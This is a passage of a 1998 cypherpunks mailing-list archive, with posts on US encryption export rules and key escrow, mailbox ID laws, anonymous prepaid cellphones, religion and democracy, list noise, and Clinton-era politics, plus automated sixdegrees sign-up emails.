releases more "greenhouse gases" than 1,000 years of Freon? They they
instead insist it doesn't matter whether an "assault weapons ban" will
really reduce crime, or whether banning spray cans will really close the
"ozone hole," so long as jailing the violators of such freedom-crushing
edicts makes us all (start ital)feel better about ourselves(end ital),
since "at least we tried"?

  Should we really be surprised to hear them now, whining "What do you
want? Everyone has affairs. Everyone lies under oath." Or, as letter-writer
Bob Gore puts it in the Sept. 20 Las Vegas Review-Journal:

  "I feel like I'm living in a country that is collectively raising an
adolescent. Listen to Billy Clinton and his friends: 'I didn't do it.
Nobody saw me do it. You can't prove a thing. Everybody does it. It's no
worse than anybody else. Kenny is a snitch ... and he's an old meanie. I do
not have the five dollars that was on your dresser (I already spent it). I
have to answer all the tough questions. I know I burnt the house down, but
think of the new one we'll get. I'm sorry for what I did even though I
didn't do anything.' ...

 "We're living an episode of 'The Simpsons', and Bart's in charge," Mr.
Gore concludes. "I can't wait for this kid to move out -- as soon as he
grows up."


Vin Suprynowicz is the assistant editorial page editor of the Las Vegas
Review-Journal. Readers may contact him via e-mail at vin@lvrj.com. The
column is syndicated in the United States and Canada via Mountain Media
Syndications, P.O. Box 4422, Las Vegas Nev. 89127.

***


Vin Suprynowicz,   vin@lvrj.com

Education rears disciples, imitators, and routinists, not pioneers of
new ideas and creative geniuses.  The schools are not nurseries of
progress and improvement, but conservatories of tradition and unvarying
modes of thought. -- Ludwig von Mises

The most difficult struggle of all is the one within ourselves. Let us not
get accustomed and adjusted to these conditions. The one who adjusts ceases
to discriminate between good and evil.  He becomes a slave in body and
soul. Whatever may happen to you, remember always: Don't adjust! Revolt
against the reality! -- Mordechai Anielewicz, Warsaw, 1943

* * *

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dan S. Camper" <lordgrey@borrowedtime.com>
Date: Fri, 18 Sep 1998 08:58:26 +0800
To: <cypherpunks@cyberpass.net>
Subject: Re: THE WHITE HOUSE: Briefing on encryption ( X-files ?? )
Message-ID: <199809181400.JAA21600@smtp.austin.outernet.com>
MIME-Version: 1.0
Content-Type: text/plain



What is the URL for the web site mentioned here?

Thanks,
DSC

>UNDER SECRETARY REINSCH: I think the simplest way to respond to that right
>now is we'll have a definition in the
>reg that will be very clear as to what the criteria are for qualification.
>And those definitions have already been dealt with
>and agreed to, so we should have them up on the web site this afternoon.


__________________________________________________________________________
Dan S. Camper                                    lordgrey@borrowedtime.com
Software Thaumaturgist
Borrowed Time, Inc.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 18 Sep 1998 02:33:03 +0800
To: cypherpunks@toad.com
Subject: Re: Democracy...
Message-ID: <199809180728.JAA03448@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



I woe the day that government and church are not seperated and I am forced
to side with one religion.  It would be another freedom wrongfully taken
from me.  I would fight back, the same way the country secured it's
independence the first time.  I take my freedom very seriously.  Facists
like you that want to distort the constitution to make introduce a
non-existant person at the top will hopefully get blasted down in the senate
as you have been before.  I would consider laws restricting my freedom as an
attack and will be forced to defend myself.

---"Brian B. Riley" <brianbr@together.net> wrote:
>
> On 9/15/98 10:27 PM, Jaeger (Jaeger@hempseed.com)  passed this wisdom:
> 
> >
> >hey, would you care to show us where "seperation of church and state" is
> >to be found in the constitution/bill of rights?  absolute right and
> >wrong is not a religious belief (necessarily)..  your religious beliefs
> >do not affect the nature of reality.  there are absolute truths by
> 
>  [snip]
> 
> >> Ever heard of seperation of church and state? Democracy? the rights of
> >>
> >> the individual?  While you certainly have the right to practice your
> >> religion in what ever manner you so choose demanding that everyone
> >> else
> >> does, or that the president of the us of ais subject to you PERSONAL
> >> faith decisions is outragous
> 
>  The first amendment states only that there shall not be 'an 
> establishment of religion' it says nada about 'separation of church and 
> state.'  The intention was simple; that there would never be an 
> 'official' state religion. It didn't say religion had no place. They were 
> escaping a regime with an established state religion that used the 
> goverment to stamp out religious deviationism. That was the sole reason 
> for that clause in the 1st amendment.
> 
> Brian B. Riley --> http://members.macconnect.com/~brianbr
>  For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>
> 
>    "...if you drink much from a bottle marked "poison."
>   and it is almost certain to disagree with you, sooner or later"
>              _Alice in Wonderland_: (Lewis Carroll)
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 19 Sep 1998 00:27:24 +0800
To: Matthew James Gering <cypherpunks@cyberpass.net>
Subject: Re: Mailboxes and Pseudonyms
In-Reply-To: <33CCFE438B9DD01192E800A024C84A192846AF@mossbay.chaffeyhomes.com>
Message-ID: <3.0.5.32.19980918093301.008e83c0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:56 AM 9/17/98 -0700, Matthew James Gering wrote:
> BTW, why are most businesses so hostile to pseudonyms? 
> I go to rent a mailbox, paid 1 yr. in advance with cash, 
> and they still want two pieces of photo ID to copy.

Where do you live?  In the US, the Post Office has rules against
anybody running mailbox services without making sure that the
customers sign some forms - you not only have to acknowledge that
the Post Office doesn't forward first class mail addressed to
mailbox companies (semi-reasonable), but also (unreasonably)
demonstrate to the Post Office's satisfaction that you
really are the you living at some other location and you don't
mind having mail addressed to you sent to this mailbox.
Exactly what that means is up to the local Postmaster;
one town where I've rented a mailbox really doesn't care,
and another had a control freak Postmistress.

But if you live in California, it's worse.  There was a law passed
in about 1994 (AB185 or AB187?) that asserted that 
1) Many businesses in California are run from mailboxes
2) Many businesses in California have committed fraud
3) Therefore, we'll force anybody who rents a mailbox,
	business or not, to identify their True Name and True Address
	and appoint the mailbox service as an agent for service of process
	so we can bust them in case they use the mailbox for fraud.
The wording of the law was actually more blatantly annoying than that.
The exact amount of ID you have to produce is tied to the local
Post Office regulations, but also requires a picture ID.
The PO will accept major credit cards and SSN cards as ID,
and my mailbox vendor didn't really want either of those,
because she didn't want the liability of having private financial data
around in a file she has to keep readily accessible for inspection.

A year or two ago, California was also having problems with
women who were battered or otherwise trying to avoid violent
ex-husbands and ex-boyfriends being tracked to where they lived
through their mailbox addresses, and some legislator was pushing
a program that would get Certified Endangered Women a mailbox
using some kind of cutout program that would give them some privacy.
Would have made much more sense just to dump the recent law,
so everybody could have some privacy.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hedges <hedges@infopeace.com>
Date: Fri, 18 Sep 1998 11:48:19 +0800
To: cypherpunks@cyberpass.net
Subject: RE: Democracy... (fwd)
Message-ID: <v03130300b227dde307da@[209.75.197.30]>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate answered:
>> From: Matthew James Gering <mgering@ecosystems.net>
>> There is no reason to think that a god does exist, so why would one even
>> need to think about or believe in the negative.
>
>There is no reason to believe one doesn't either. If we take your claim at
>face value you need to demonstrate your test that shows the irrelevancy
>of god. God is not a belief in a negative, another straw man, but rather
>a mechanism or expression of human psychology and the need for humans to
>find patterns (ie reason) in things.

Mr. Gering, you may have heard the argument that there is also no reason to
believe that you exist, except your sense impressions which can be proven
to be unreliable and easily falsified. The old 'disembodied nervous system
floating in a tank getting poked by graduate students' premise could
explain your entire range of perceptions of your childhood, schooling,
adolescence, growing up, eating pizza at the office, etc.

I wondered for a while, and then I threw it in the waste bin, because it's
pointless and a waste of energy to wonder whether or not I exist. I decided
to trust my sense impressions well enough to go to the movies and jog in
the mornings and go to work and write code.

I certainly do not stop living because there is no reason to believe that I
exist.

There is also no reason for me to believe that you exist, because you could
be Toto forging the mail. You didn't sign your message, I don't have your
key fingerprint, I doubt I ever will, and besides, maybe someone monitored
your keystrokes and stole your key.

And in my experience, certain 'sense impressions' lead me to conclude that
the existence of 'god' as some sort of cohesive, coherent, universal-scale
eternal being is perhaps possible. Looking at cloud formations on the
plane, I sometimes feel like an astrocyte wandering a huge purkinje
skyscape, or like a star careening through a nebula. And the erosion
patterns on the mountains below look just like dribbling water on
sandcastles. And so there is something, some kind of underlying order, the
effects of which we see at every scale.

Though I'm incapable of understanding the transcendent order, or of
conceiving what the transcendent order might be, I do not block the
possibility from my mind. And that leads to some interesting experiences.

No, I don't follow the often arbitrary rhetoric of many organised
religions, and in that point I agree with your opinion of the concept.
Although, some of them espouse some interesting ideas.

To wander back to the thread topic, democracy, and to totally wrench
everything out of context, I've heard the same sort of argument used
against democratic empowerment. There's no reason to believe that 'the
people' are capable of making their own decisions, and there's no reason to
believe that stronger, more direct democracy would work as an effective
system of governance and organisational decision-making. 'The people' are
demonstrably idiotic, moronic fools, sheep, who must be lead by 'those in
the know'. By that logic, it follows we should concentrate all power into
the hands of a few beneficent rulers, or an educated aristocracy, or
perhaps just one -- the philosopher king.

I nominate myself. Any objections?

Please e-mail for address to send offerings and libations to me, the ruler
of the universe. Donations accepted in the form of gifts of $100 or more.
Gold and precious stones preferred. Multitudinous blessings to you, free of
charge.

Mark Hedges


__________________________________________________________________
  Mark Hedges   hedges@infopeace.com   www.infopeace.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 18 Sep 1998 09:20:03 +0800
To: Chip Mefford <cmefford@video.avwashington.com>
Subject: Re: Mobile phone tracking, pagers, etc
In-Reply-To: <19980917222329.A1364@die.com>
Message-ID: <199809181411.KAA24933@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:13 AM 9/18/98 -0400, Chip Mefford wrote:
>
>
>Actually, 
>
>there seems to be a screw up out  there.
>
>Right now, one can go down the 7/11, and pay 
>cash for a prepaid cellphone, and renew it with 
>cellphone time cards also purchased with cash.
>
>No paperwork, NONE.
>
>I have one.

I pointed this out two years ago when the first prepaid cellular phones
appeared in NYC.  

This is an example of the problem with regulations that depend on keeping
"bad" people from having bank accounts, net accounts, phone accounts, etc.
These depend on *all* sellers of these account services conspiring with the
government in a cartel to deny services (a Government Denial of Service
attack).  But such a cartel (even if backed by law) is impossible to
maintain.  There is too much profit in breaking it.

DCF



>From Wednesday's WSJ:

"In a depressing turn for law-enforcement authorities, prepaid service has
caught on with drug dealers and other criminals. With no contract and no
bills, there is no paper trail -- a feature that also makes the service
attractive to tax evaders."


September 16, 1998

Prepaid Plans Start to Open Up The Cellular-Phone Market

By GAUTAM NAIK Staff Reporter of THE WALL STREET JOURNAL

Warren Pippin, a police officer in Savannah, Ga., ditched his traditional
cellular-phone contract two years ago. "I couldn't stand paying bills every
month," he says. "This is so much simpler."

Now he uses prepaid cellular-phone service, a plan that was hatched in
Portugal four years ago, took Europe by storm and is finally catching on in
the U.S. A user simply buys an off-the-shelf phone, along with a card
representing a certain financial value. The phone is activated by dialing a
phone number and a personal identification number printed on the card. When
the money runs out, the card can be replenished via a fresh payment.

Those are just the basics. In Portugal, refinements let prepaid users
replenish their cards at automated teller machines. And wherever it is
used, the prepaid method is democratizing a product and service long
confined to the well-heeled. Although only 2% of America's 54 million
wireless subscribers use prepaid service today, most are people who
otherwise wouldn't dream of owning a mobile phone: inner-city residents,
students, people with poor credit.

While rates for prepaid service are generally higher than regular cellular
plans, users have no 12-month contracts or monthly fees to contend with.
All told, compared with regular "leisure" users, prepaid customers spend
roughly 15% to 25% less per month.

"Prepay is enabling people that have wanted wireless phones for a long,
long time to finally get one," says Terry Hayes, a marketing executive at
Omnipoint Corp., which recently launched a "no monthly fee" prepaid
offering. The company, which operates from Maine to Maryland, sells prepaid
phones in colorful packages at gas stations, Duane Reade drugstores and its
own outlets. Every second Omnipoint customer has prepaid service.

'Best Thing for Kids'

Page Tel, a wireless-service reseller in Detroit, has signed up 85,000
prepaid mobile-phone users, most of them students and inner-city residents.
One popular product costs $39, and includes a Motorola flip phone. "It's
the best thing for kids," says Laith Korkis, the owner of Page Tel. "They
buy a $39 phone and a $10 prepaid card and walk down the street looking cool."

In a depressing turn for law-enforcement authorities, prepaid service has
caught on with drug dealers and other criminals. With no contract and no
bills, there is no paper trail -- a feature that also makes the service
attractive to tax evaders.

Europe's prepaid users number some 14 million, or 20% of all mobile
subscribers. By the end of 1998, the number of prepaid users will rise to
22 million, or 25% of the total European market, according to Salomon Smith
Barney. In the U.S., playing catch up, virtually every big wireless
provider has jumped into prepaid service: Half of PrimeCo Personal
Communications LP's customers are prepaid, while 40% of BellSouth Corp.'s
subscribers are. Prepaid will make up 25% of all new wireless sign-ups this
year, estimates Donaldson, Lufkin & Jenrette.

U.S. providers remain technologically behind their European counterparts,
who adopted digital standards far earlier. European digital phones have a
special card that can be inserted into the phone to activate special
features such as Portugal's ATM replenishment. In the U.S., users can only
replenish their prepaid phone by paying cash at a store or via credit card.

Portugal Telecom SA, Portugal's main phone company, got the idea for
prepaid cellular service when executives realized that the nation's
sophisticated network of ATMs could be used as mobile-phone "refueling"
stations. The service was launched in 1995; today, 68% of all Portugal
Telecom's mobile-phone customers are prepaid.

Telecel Communicacoes Pessoais SA, a rival wireless carrier that is 50.9%
owned by Airtouch Communications Inc. of the U.S., has been equally
aggressive. Its Vitamina prepaid phones are sold in brightly colored
packages, each shaped in the form of a pill. One popular brand is aimed at
corporations: The company can specify exactly how much credit it wants each
employee's phone to have, and how often the credit should be topped up.

The Frog Factor

Another product, Vitamina K (for kid), is for children ages eight to 15.
The phones look like frogs and have six colorful buttons that can be
programmed by a parent. "One is for mummy, two for daddy, three for
grandma. That's all the kid has to know," explains Joao Mendes Dias,
Telecel's product-marketing director.

An especially big hit is Vitamina R (for radicals), sold to the
15-to-24-year-old set and featuring only fashionable Ericsson or Nokia
models. If a Vitamina R customer calls another Vitamina R user, the call is
35% cheaper than calling someone else. And the advertising slogan has its
fans, as well: "Vitamina R. It heals everything but hangovers."

Sandra Santos, a 21-year-old student in Lisbon, likes her snazzy Vitamina
phone because it provides a running display of the credit available at any
time. When she runs low, there is always a cash machine nearby. Thanks to
special calling rates, her Vitamina bills are half what she paid with a
previous subscription plan. And her previous phone? "I gave that to my
dad," she says.

Airtouch now hopes to apply Telecel's ideas-especially the savvy marketing
-- in the U.S. The San Francisco company is pitching prepaid to students in
Ohio and Michigan. During the World Cup soccer tournament, it targeted
Hispanic customers in Southern California. In the last 12 months, about 10%
of all new Airtouch customers joined on the prepaid plan. That number could
double in the next 12 months, says Airtouch.

Dave Whetstone, director of the company's prepaid business, noting that his
company has extensive interests in European wireless carriers, adds: "We
look at our European operations and say, 'Wow, prepaid is exploding there.
There may be some cultural differences, but there's got to be something
there' " for U.S. consumers.

Airtouch won't have to convince Jenifer Borrusch, an 18-year-old student at
Eastern Michigan University. Ms. Borrusch's parents wanted to give her a
traditional mobile phone in case of emergencies during her 45-minute drive
from Livonia, Mich., to college. But because she might overspend, they gave
her a prepaid device instead. The ploy worked. "I won't even let my best
friend use it," she says. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 18 Sep 1998 09:31:11 +0800
To: "Dan S. Camper" <lordgrey@borrowedtime.com>
Subject: Re: THE WHITE HOUSE: Briefing on encryption ( X-files ?? )
In-Reply-To: <199809181400.JAA21600@smtp.austin.outernet.com>
Message-ID: <199809181432.KAA09252@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Lordgrey asks for a BXA URL:

BXA info on the new crypto policy:

   http://www.bxa.doc.gov/whatsnew.htm

   http://207.96.11.93/Encryption/Default.htm

The only info there not issued by the White House is a list
of the 45 countries who get favorable treatment.

CDT says the implementation regs are due to be issued by
BXA sometime in October, and to watch out: "the devil is in 
the details."

In the meantime the 11 corporations who announced support
for the new policy will continue hemming, hawing and heeding
threat of license delay:

Here they are:

Ascend, Cisco Systems, 3Com, Hewlett-Packard Company, 
Intel, Netscape Communications, Network Associates, Novell, 
RedCreek Communications, Secure Computing, Sun 
Microsystems.

One bit of sunshine, though, is Germany has announced that it
will lead a Euro attack on US crypto export limits because they
harm economic security:

   http://jya.com/cn091898.htm








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 18 Sep 1998 12:54:23 +0800
To: Jim Burnes <cypherpunks@cyberpass.net
Subject: Re: Cyberpunks Signal-to-Noise Ratio
In-Reply-To: <Pine.LNX.3.96.980917130032.438B-100000@jb3.fastrans.net>
Message-ID: <v03130300b2284d3fb7a3@[209.66.100.84]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:02 PM -0700 9/17/98, Jim Burnes wrote:
>Far be it from me to complain about the content-free
>nature of others postings, but has anyone else noticed
>that the signal on cypherpunks is being lost in the noise?
>

Complaining about, or even just commenting on, the problems with the
Cypherpunks list does no good.

* the clueless hotmail, sixdegrees, AOL, etc. posters will not even _read_
the comments, let alone understand them, let alone care. They will continue
to ramble on about warez, band stickers, where their shoes are, kool bandz,
etc.

* as the list is not filtered, censored, moderated or otherwise controlled,
how can a complaint about S/N do anything? Are you asking for someone to
filter out the noise posts? Are you commissioning the writing of more
signal posts?

* the list has had several bouts in the past with bombardment by noise
posts. Cf. Detweiler (tentacles, snakes of medusa, etc.), Vulis, Toto, etc.
Toto's extremely long, incoherent rants consumed far more bandwidth than
the current noise constitutes.

 In short, the _only_ route to fix the S/N is to increase signal. And that
happens not be exhorting others to write more signal, but by the act of
actually writing signal. And that tends to happen when a critical mass of
interested people are having a  discussion on topics of interest.

And that proceeds in spurts, not surprisingly, as topics come to the fore.

Meanwhile, complaining only adds to the noise.

--Tim May

(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Fri, 18 Sep 1998 14:00:28 +0800
To: cypherpunks@toad.com
Subject: Re: Mobile phone tracking, pagers, etc
In-Reply-To: <Pine.LNX.3.95.980918081019.15546H-100000@video.avwashington.com>
Message-ID: <3602A53A.48E7@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Chip Mefford wrote:
> 
> Actually,
> 
> there seems to be a screw up out  there.
> 
> Right now, one can go down the 7/11, and pay
> cash for a prepaid cellphone, and renew it with
> cellphone time cards also purchased with cash.
> 
> No paperwork, NONE.
> 
> I have one.
> 
> While all of the technology applies, and certainly it is possible
> to determine things by analyzing calling habits, I can't see how one
> can easily determine who has cellphone #blahblahblahblahblah when
> you just bought a box at an out of town 7/11 during the breakfast
> rush with cash.
> 
> Esp if one doesn't make a lot of calls.
> 
Tasty. Especially if one's partner in crime has taken the same
precaution.

To the LEAs: technology giveth and technology taketh away.

BTW - do these phones have a modem connector? If not could one be added?
Then you get end-to-end privacy too.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sixdegrees"<f3pf50v6@auto.sixdegrees.com>
Date: Fri, 18 Sep 1998 10:46:27 +0800
To: "Lefty CyberSlasher"<cypherpunks@toad.com>
Subject: Your new password
Message-ID: <199809181531.IAA20385@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Name: Lefty CyberSlasher
sixdegrees password: landmelt

Congratulations Lefty. You're well on your way to 
becoming a full sixdegrees(tm) member. Here is your member 
password: landmelt. Use it to log-in on the home page 
at the sixdegrees Web site, http://www.sixdegrees.com. 
We'll ask you for a little more information to complete your 
registration, and then you'll be ready to start networking. 

It's important that you return to the site and log-in. Your 
membership will not be complete until you do so.

Once you've successfully logged in with your password, just go 
to Personal Profile and you'll be able to choose your own 
password.

Thanks for becoming part of sixdegrees. We're looking forward 
to seeing you at the site. 

====================================================================
PLEASE NOTE: All replies to this address are processed by a computer.
If you believe you received this e-mail in error, and it was not your 
intention to become a sixdegrees member, or if you have any problems, 
questions or requests send an e-mail to issues@sixdegrees.com
and someone will get back to you as soon as possible.
====================================================================


E.SI.BAM.1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 18 Sep 1998 14:12:39 +0800
To: Alan Olsen <alan@clueserver.org>
Subject: Re: Questions for Magaziner?
In-Reply-To: <v04011700b22791ad2d2d@[139.167.130.248]>
Message-ID: <v03130302b2285ea5ce37@[209.133.20.24]>
MIME-Version: 1.0
Content-Type: text/plain



(I'm leaving the damned multiple lists cc:ed on this, as I have no idea
where this thread came from. For those of you who send me notes saying I am
not allowed to post on your list, plonk.)


At 2:33 AM -0700 9/19/98, Alan Olsen wrote:
>On Fri, 18 Sep 1998, Robert Hettinga wrote:
>
>> Anyway, In light of more recent crypto-shenanigans from Billary, and the
>> fact that this thing's a small crowd, I figured I'd ask if anyone on these
>> lists had a question they wanted me to ask him.
>
>"With all the demands from Governent to escrow keys, what steps are being
>taken to protect the these keys and/or backdoors from misuse from people
>within the Government and those outside of the Government?"
>
>"Would you use escrowed cryptography for your private communications?  Who
>would you trust to hold those keys?"

Well, I believe that even asking these sorts of questions (and possibly
getting answers from government) plays into the hands of the GAKkers.

After all, suppose they give pretty good answers? What if, for example,
they propose a committee consisting of the entire Supreme Court, the
Director of the Sierra Club, and so on, and say that a _unanimous_ vote is
required to gain access to a key?

Does this at all change the fundamental unconstitutionality of telling me
that I will face imprisonment if I speak or write in a manner which is not
part of their "escrow" arrangement? If I keep a diary without depositing an
escrowed key with this noble, careful, thoughtful committee of wise persons?

Of course not. My speech, my writing, my private codes, my whisperings, my
phone conversations...all of these...are not subject to govenmwental
approval. "Congress shall make no law..."

Doesn't say that Congress or the courts of the President get to declare
illegal certain modes of speaking. (*)

(* Please, I hope no one brings up "loud speech," "shouting fire," "obscene
speech," "seditious speech," "slanderous speech," etc. This is well-trod
ground, but clearly all of these apparent limits on speech, whether one
agrees with them or not, have nothing to do with an overbroad requirement
that speech only be in certain languages, that letters only be written on
carbon paper with a copy filed with the government, and so on. The
restrictions on _some_ kinds of speech are not a license to license speech,
as it were, or to require escrow of papers, letters, diaries, and phone
conversations and such.)

My point about Alan's (and others') points is that if we get engaged in
this kind of debate about how key escrow might work, we shift the debate
from where it ought to be to where they _want_ it to be, namely, to issues
of practicality.

My view is that my writings are mine. They can try to get them with a
search warrant or a court order, but they'd better not threaten me with
imprisonment if I choose to write in some language they can't read. And
that's all crypto really is, of course. Just another language.

--Tim May

(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sixdegrees"<fcqf50h6@auto.sixdegrees.com>
Date: Fri, 18 Sep 1998 11:30:51 +0800
To: "Spermy CyberPorno"<cypherpunks@toad.com>
Subject: Your new password
Message-ID: <199809181623.JAA20744@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Name: Spermy CyberPorno
sixdegrees password: rampnull

Congratulations Spermy. You're well on your way to 
becoming a full sixdegrees(tm) member. Here is your member 
password: rampnull. Use it to log-in on the home page 
at the sixdegrees Web site, http://www.sixdegrees.com. 
We'll ask you for a little more information to complete your 
registration, and then you'll be ready to start networking. 

It's important that you return to the site and log-in. Your 
membership will not be complete until you do so.

Once you've successfully logged in with your password, just go 
to Personal Profile and you'll be able to choose your own 
password.

Thanks for becoming part of sixdegrees. We're looking forward 
to seeing you at the site. 

====================================================================
PLEASE NOTE: All replies to this address are processed by a computer.
If you believe you received this e-mail in error, and it was not your 
intention to become a sixdegrees member, or if you have any problems, 
questions or requests send an e-mail to issues@sixdegrees.com
and someone will get back to you as soon as possible.
====================================================================


E.SI.BAM.1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 18 Sep 1998 07:51:32 +0800
To: jvb@ssds.com
Subject: Re: Cyberpunks Signal-to-Noise Ratio
In-Reply-To: <Pine.LNX.3.96.980917130032.438B-100000@jb3.fastrans.net>
Message-ID: <199809181137.MAA12212@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




> Far be it from me to complain about the content-free
> nature of others postings, but has anyone else noticed
> that the signal on cypherpunks is being lost in the noise?

There are a couple of filtered lists I think, Eric Blossom used to do
one and Ray Arachelian also.  Personally I just rely on the liberal
use of the delete key.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Fri, 18 Sep 1998 14:42:03 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Scorched Earth
In-Reply-To: <199809180440.GAA25125@replay.com>
Message-ID: <3602B847.21BB@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:
> 
> :: RANDALL: Don, you've got a story today about what could happen if
> :: Republicans press for impeachment on, basically, a sex case against the
> :: president. A Democratic scorched-earth policy against the GOP. Tell us
> :: about that?
> ::
Let's see, Starr's inquiries into Clinton sex life *could* be seen, by a
sympathetic onlooker, as a very elaborate trap which angered Clinton
sufficiently that he became careless and fell into it. This leads to the
resounding cries of "if he lied UNDER OATH about his *S*E*X* life what
ELSE is he lying to us about?" This is OK because the investigation was
carried out under a legal authority.

Meanwhile, back in Congress, the Republicans are decrying Hyde's
affair's disclosure as a horrible, unwarranted attack with the intent to
"intimidate and obstruct justice" and the Parties are trying to cover
their own asses by declaring a truce regarding smear campaigns and dirt
digging. So, this type of disclosure by civilians through a *free* press
is "wrong" and should be prevented.

Scorch on, I say. If they are afraid to have us dig into their
extramarital affairs what else are they hiding from us? Tobacco deals,
arms deals, kickbacks, pageboys? How deep is this dirt they're covering
up?

The only downside is that after the shit has all fallen to earth the
only persons who will dare to run for office under the new rules of
engagement will be worse than what we have now even if they're
squeaky-clean from a morals perspective.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "I.A. Eaglemail" <eaglemailbox@hotmail.com>
Date: Fri, 18 Sep 1998 15:01:16 +0800
To: 5j0g50e0@auto.sixdegrees.com
Subject: Re: Hacker D00D
Message-ID: <19980918194942.2300.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



DENY

>From cypherpunks-errors@toad.com Fri Sep 18 12:23:32 1998
>Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id 
MAA22376 for cypherpunks-unedited-outgoing; Fri, 18 Sep 1998 12:16:52 
-0700 (PDT)
>Received: from neptune.sixdegrees.com (neptune.sixdegrees.com 
[206.41.12.34]) by toad.com (8.7.5/8.7.3) with SMTP id MAA22371 for 
<cypherpunks@toad.com>; Fri, 18 Sep 1998 12:16:49 -0700 (PDT)
>Message-Id: <199809181916.MAA22371@toad.com>
>Date: Fri, 18 Sep 1998 15:15:42 -0500
>From: "sixdegrees"<5j0g50e0@auto.sixdegrees.com>
>To: "Joe Cyberspanker"<cypherpunks@toad.com>
>Subject:  Hacker D00D
>Sender: owner-cypherpunks@toad.com
>Precedence: bulk
>
>You've been listed again. Looks like this whole sixdegrees 
>thing is working. Your networking potential is growing by the 
>second. Hacker D00D listed you as "Mother."
>
>Please let us know if you are in fact Hacker's Mother:
>
>====================================================================
>TO RESPOND:
>
>FIRST, click your mail program's reply button. 
>
>SECOND, in the reply e-mail that opens, on the first line of 
>the message body, type only the word CONFIRM or the word DENY.
>
>THEN CLICK SEND.
>
>If you prefer, you can take care of this contact confirmation 
>by visiting the site at http://www.sixdegrees.com and going to 
>MY CONTACTS after logging in on the home page. You can also list 
>new contacts there.
>
>We look forward to hearing from you.
>
>====================================================================
>PLEASE NOTE: All replies to this address are processed by a computer.
>If you have any problems, questions or requests send an e-mail to 
>issues@sixdegrees.com and someone will get back to you as soon as 
>possible.
>====================================================================
>
>
>E.DB.ANB.4
>


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Fri, 18 Sep 1998 01:16:10 +0800
To: cypherpunks@toad.com
Subject: thanks...
Message-ID: <Pine.GSO.3.96.980918124626.4141A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain



I would like to thank the f for helping me...
CORY
BOB
RIC
ANONYMOUS
DUTRA
R KEN
XENA...
BILL
ALBERT
MIKE
JIM
mgraffam
jya

and those that helped me with other things.
  I cannot remember you all coz my pc or whoever did  deleted your
   messages to me without my knowledge.(it just disappeared)

Your replies helped me with my seminar.

THANK YOU!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Some people they might say that I'm hard to get to know.
I go my own sweet way, well that maybe so.
Something about the crowd that makes me walk alone. 
I never had a need in me to be the party's life and soul.

It's me Bernie.
metaphone@altavista.net
``````````````````````````````````````````````````````````````````````````````




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
